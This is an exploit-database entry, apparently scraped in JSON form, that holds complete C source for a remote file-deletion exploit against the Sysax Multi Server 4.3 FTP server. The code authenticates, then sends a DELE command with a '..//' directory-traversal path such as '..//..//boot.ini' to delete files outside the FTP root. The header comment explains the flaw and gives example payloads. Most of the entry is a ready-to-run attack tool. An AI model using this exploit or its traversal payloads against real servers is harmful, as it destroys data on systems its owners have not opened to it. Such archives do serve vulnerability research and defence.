Sysax Multi Server 4.3 Remote Arbitrary Delete Files Exploit

2009-03-24T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-10861", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-03-24T00:00:00", "title": "Sysax Multi Server 4.3 Remote Arbitrary Delete Files Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10861", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2009-03-24T00:00:00", "sourceData": "\n /*\r\nSysax Multi Server v4.3 Remote Delete Files.\r\nServer FTP.\r\nhttp://www.sysax.com/\r\n\r\n-------------------------------------------------------------------------------------\r\nA vulnerability is caused due to an input validation error when handling FTP \\"DELE\\" \r\nrequests. This can be exploited to escape the FTP root and delete arbitrary files on \r\nthe system via directory traversal attacks using the \\"..//\\" character sequence.\r\n-------------------------------------------------------------------------------------\r\n\r\nYou can delet file boot.ini => DELE ..//..//..//..//..//..//boot.ini\r\n\r\n\r\nAuthor: Jonathan Salwan\r\nMail : submit [AT] shell-storm.org\r\nWeb : http://www.shell-storm.org\r\n*/\r\n\r\n#include \\"stdio.h\\"\r\n#include \\"unistd.h\\"\r\n#include \\"stdlib.h\\"\r\n#include \\"sys/types.h\\"\r\n#include \\"sys/socket.h\\"\r\n#include \\"netinet/in.h\\"\r\n\r\nint syntax(char *file)\r\n\t{\r\n\tfprintf(stderr,\\"Sysax Multi Server v4.3 Remote Delete Files\\\\n\\");\r\n\tfprintf(stderr,\\"=>Syntax : <%s> <ip> <port> <login> <passwd> <file>\\\\n\\",file);\r\n\tfprintf(stdout,\\"=>Exemple : %s 127.0.0.1 21 login1 password1 ..//..//..//boot.ini\\\\n\\",file); \r\n\texit(0);\r\n\t}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n\tif (argc < 5)\r\n\t\tsyntax(argv[0]);\r\n\t\r\n\tint port = atoi(argv[2]);\r\n\r\n\tint mysocket;\r\n\tint mysocket2;\r\n\tint srv_connect;\r\n\tint sockaddr_long;\r\n\r\n\r\n\t\tstruct sockaddr_in sockaddr_mysocket;\r\n\t\tsockaddr_long = sizeof(sockaddr_mysocket);\r\n\t\tsockaddr_mysocket.sin_family = AF_INET;\r\n\t\tsockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);\r\n\t\tsockaddr_mysocket.sin_port = htons(port);\r\n\r\n char request[50];\r\n\tchar answer[100];\r\n\r\n fprintf(stdout,\\"[+]Connect to Server %s\\\\n\\",argv[1]);\r\n\r\n mysocket2 = socket(AF_INET, SOCK_STREAM, 0);\r\n if(mysocket2 == -1){\r\n fprintf(stderr,\\"[-]FAILED SOCKET\\\\n\\");\r\n\t\t\treturn 1;}\r\n\r\n\tsrv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);\r\n\t\t\r\n\tif (srv_connect != -1)\r\n \t\t{\t\r\n\r\n\t\tsprintf(request, \\"USER %s\\\\r\\\\n\\", argv[3]);\t\t\r\n\t\t\tif (send(mysocket2,request,strlen(request),0) == -1){\r\n\t\t\t\tfprintf(stderr,\\"[-]Send Request USER\\\\t\\\\t[FAILED]\\\\n\\");\r\n\t\t\t\tshutdown(mysocket2,1);\r\n\t\t\t\treturn 1;}\r\n\t\t\telse{\r\n\t\t\t\tmemset(answer,0,100);\r\n\t\t\t\trecv(mysocket2,answer,sizeof(answer),0);\r\n\t\t\t }\r\n\r\n\r\n\t\tsprintf(request, \\"PASS %s\\\\r\\\\n\\", argv[4]);\r\n if (send(mysocket2,request,strlen(request),0) == -1){\r\n fprintf(stderr,\\"[-]Send Request PASS\\\\t\\\\t[FAILED]\\\\n\\");\r\n shutdown(mysocket2,1);\r\n return 1;}\r\n else{ \r\n\t\t\t\tmemset(answer,0,100);\r\n recv(mysocket2,answer,sizeof(answer),0);\r\n fprintf(stdout,\\"[+]>>%s\\",answer);\r\n }\r\n\r\n\r\n sprintf(request, \\"SYST\\\\r\\\\n\\");\r\n if (send(mysocket2,request,strlen(request),0) == -1){\r\n fprintf(stderr,\\"[-]Send Request PASS\\\\t\\\\t[FAILED]\\\\n\\");\r\n shutdown(mysocket2,1);\r\n return 1;}\r\n else{\r\n memset(answer,0,100);\r\n recv(mysocket2,answer,sizeof(answer),0);\r\n fprintf(stdout,\\"[+]>>%s\\",answer);\r\n }\r\n\r\n\r\n\t\tsprintf(request, \\"DELE %s\\\\r\\\\n\\", argv[5]);\r\n if (send(mysocket2,request,strlen(request),0) == -1){\r\n fprintf(stderr,\\"[-]Send Request DELE\\\\t\\\\t[FAILED]\\\\n\\");\r\n shutdown(mysocket2,1);\r\n return 1;}\r\n else{ \r\n\t\t\t\tmemset(answer,0,100);\r\n recv(mysocket2,answer,sizeof(answer),0);\r\n fprintf(stdout,\\"[+]>>%s\\",answer);\r\n }\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\telse{\r\n\t\tfprintf(stderr,\\"[-]Connect\\\\t\\\\t[FAILED]\\\\n\\");\r\n\t\tshutdown(mysocket2,1);\r\n\t\treturn 1;}\r\n\r\n\r\n\tshutdown(mysocket2,1);\r\n\r\n\r\nfprintf(stdout,\\"[+]Done! %s has been deleted\\\\n\\", argv[5]);\r\nreturn 0;\r\n}\n ", "id": "SSV:10861", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:55:39", "reporter": "Root", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645567449}}